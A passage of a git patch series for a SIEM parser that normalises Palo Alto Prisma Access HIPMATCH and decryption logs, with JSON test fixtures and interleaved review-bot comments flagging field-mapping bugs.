.../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..45f8d34f8 --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file From e314c268cf04780877f6b195703ac7f420bfa0b2 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:48:59 +0100
Subject: [PATCH 081/150] fix(PaloAlto): extract host id and rule name for HIPMatch
---
 Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml | 4 ++--
 .../paloalto-prisma-access/tests/globalprotect_csv.json | 1 +
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 1 +
 .../paloalto-prisma-access/tests/test_globalprotect.json | 1 +
 .../paloalto-prisma-access/tests/test_hipmatch_json.json | 4 ++++
 .../paloalto-prisma-access/tests/test_new_globalprotect.json | 1 +
 6 files changed, 10 insertions(+), 2 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 84514974e..07492992b 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -577,7 +577,7 @@ stages:
 event.module: "{{parsed_description.message.module}}"
 host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
 host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
 host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
 host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
 host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -602,7 +602,7 @@ stages:
 observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
 observer.serial_number: "{{parsed_event.message.DeviceSN}}"
 observer.name: "{{parsed_event.message.DeviceName}}"
- rule.name: "{{parsed_event.message.Rule}}"
+ rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
 rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
 source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
 "name": "AAAABBBBB",
 "os": {
 "version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
index e0cb016eb..e51f19fbb 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
 "name": "2021-02707",
 "os": {
 "version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
index 5cc8690a2..70c31c202 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
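Review bot: A HIP profile name (`VPN Compliant` in test_hipmatch_json) now lands in `rule.name`, the same field that carries security-policy rule names for traffic, threat and decryption events, so detections or dashboards keyed on `rule.name` will mix policy rules with HIP objects. If the distinction matters, a dedicated vendor field declared in fields.yml (e.g. `paloalto.hip.match_name`) would keep the two apart; if the overload is intended, a one-line comment above this line saying that HIPMATCH events carry the matched HIP profile name here would spare the next reader the check. The enclosing set action continues outside the hunk.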
@@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json index 45f8d34f8..fd4e5a75f 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From fd17ed126f555368791cad8216454c1bb8fd7d33 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:51:21 +0100 Subject: [PATCH 082/150] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-prisma-access/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 07492992b..63f72e8e0 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -382,6 +382,49 @@ pipeline:
 - HighResolutionTimestamp
 delimiter: ","
+ # HIPMATCH CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceUser
+ - VirtualLocation
+ - MachineName
+ - EndpointOSType
+ - SourceAddress
+ - HipMatchName
+ - RepeatCount
+ - HIPMatchType
+ - FUTURE_USE
+ - FUTURE_USE
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - SourceIPv6
+ - HostID
+ - EndpointSerialNumber
+ - SourceDeviceMac
+ - HighResolutionTimestamp
+ - ClusterName
+ delimiter: ","
+
 - name: parsed_timestamp
 external:
 name: date.parse
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json
new file mode 100644
index 000000000..140e7657e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From f35315945b88ff7a1085f7d2e531cac1196f78d8 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:55:42 +0100
Subject: [PATCH 083/150] fix(PaloAlto): improve support for decryption events
---
 .../paloalto-prisma-access/_meta/fields.yml | 15 +++
 .../paloalto-prisma-access/ingest/parser.yml | 10 ++
 .../tests/test_decryption_json.json | 119 ++++++++++++++++++
 3 files changed, 144 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json
diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
index 6382be28b..3b3fd8fc6 100644
--- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
@@ -297,3 +297,18 @@ paloalto.threat.name:
 description: The name of the threat
 name: paloalto.threat.name
 type: keyword
+
+paloalto.tls.chain_status:
+ description: The trust in the TLS chain
+ name: paloalto.tls.chain_status
+ type: keyword
+
+paloalto.tls.root_status:
+ description: The trust in the root certificate
+ name: paloalto.tls.root_status
+ type: keyword
+
+paloalto.tls.sni:
+ description: The server name indication
+ name: paloalto.tls.sni
+ type: keyword
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 63f72e8e0..8da957210 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -636,6 +636,13 @@ stages:
 network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
 network.protocol: "{{parsed_description.message.proto}}"
 network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+ tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+ tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+ tls.curve: "{{parsed_event.message.EllipticCurve}}"
+ tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+ tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+ tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+ tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
 observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
 observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
 observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -809,6 +816,9 @@ stages:
 paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}"
 paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}"
 paloalto.threat.name: "{{parsed_threat.message.threat_description}}"
+ paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+ paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+ paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
 - set:
 source.user.name: "{{parsed_event.message.SourceUser}}"
 user.name: "{{parsed_event.message.SourceUser}}"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json
new file mode 100644
index 000000000..35fa4abec
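Review bot: `tls.cipher` cannot render, because its template reads `parsed_event.message.message.TLS_AUTH` — no other template on this line uses a nested `message` key — and the JSON dialect spells the field `TLSAuth` (see the fixture at L604) while the DSV column is `TLS_AUTH`; consistently, neither new fixture's expected output contains `tls.cipher`. The same JSON/CSV naming split hits `tls.server.x509.subject.common_name` and `tls.server.x509.serial_number`, which read `SubjectCommonName`/`CertificateSerialNumber` while the JSON record carries `CommonName`/`CertificateSerial`, so both stay empty for JSON input. Fall back across both spellings the way the surrounding `network.*` lines do: `tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLSAuth or parsed_event.message.TLS_AUTH}}"`, `tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName or parsed_event.message.CommonName}}"`, `tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber or parsed_event.message.CertificateSerial}}"`. Note that the concatenated value is not an IANA cipher-suite name (those also carry the signature algorithm, e.g. `TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384`), so consumers matching `tls.cipher` against suite lists will not hit it; a comment above the line stating that it is a vendor-derived approximation would save the next reader from that assumption. The enclosing `set` action begins outside the hunk.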
--- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json 
@@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file From c93a4a974e1e4417b0c7e4496cfc9327ed6b3160 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:57:01 +0100 Subject: [PATCH 084/150] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-prisma-access/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 8da957210..d212c5fcc 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
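Review bot: The expected `user` object is `{"domain": "jdoe", "name": "example"}` while `source.user` in the same fixture is `{"domain": "example", "name": "jdoe"}`, both derived from the one `SourceUser` value `example\jdoe`; the fixture therefore pins a swapped domain/name split on `user.*` (the stage that splits the backslash form is outside this hunk), and `related.user` lists the domain `example` as though it were an account. Left as is, this test locks the inversion in, and any detection keyed on `user.name` would match the domain rather than the account for JSON decryption events. The expected block should read `"user": {"domain": "example", "name": "jdoe"}`, with `related.user` holding only `jdoe` as the CSV fixture does, and the corresponding parser fix landed in the same commit.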
@@ -425,6 +425,124 @@ pipeline:
 - ClusterName
 delimiter: ","
+ # DECRYPTION CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
